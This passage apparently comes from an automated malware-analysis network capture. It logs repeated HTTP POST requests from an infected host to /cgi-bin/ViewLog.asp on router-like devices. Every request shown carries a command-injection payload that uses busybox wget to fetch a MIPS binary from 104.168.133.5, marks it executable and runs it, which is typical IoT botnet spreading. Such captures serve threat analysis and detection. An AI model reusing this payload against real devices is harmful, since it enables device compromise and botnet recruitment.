                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.872586012 CET1257INHTTP/1.1 307 Temporary Redirect
                                              Date: Thu, 23 Nov 2023 04:17:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 152
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              476192.168.2.145881631.136.9.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.299422026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.474236965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.621977091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.649481058 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              477192.168.2.143578262.29.86.98080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.333872080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              478192.168.2.145501885.122.227.1368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.384975910 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.214308023 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              479192.168.2.145942431.136.90.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.577267885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.170353889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.322285891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.754301071 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.361984968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.577589035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.544754028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              480192.168.2.146012631.172.189.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.635817051 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.650322914 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              481192.168.2.143940662.29.86.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.657206059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              482192.168.2.143289231.136.155.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.763266087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.330343008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.482268095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.754304886 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.361991882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.577579021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.544748068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              483192.168.2.144898694.136.146.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.967458010 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
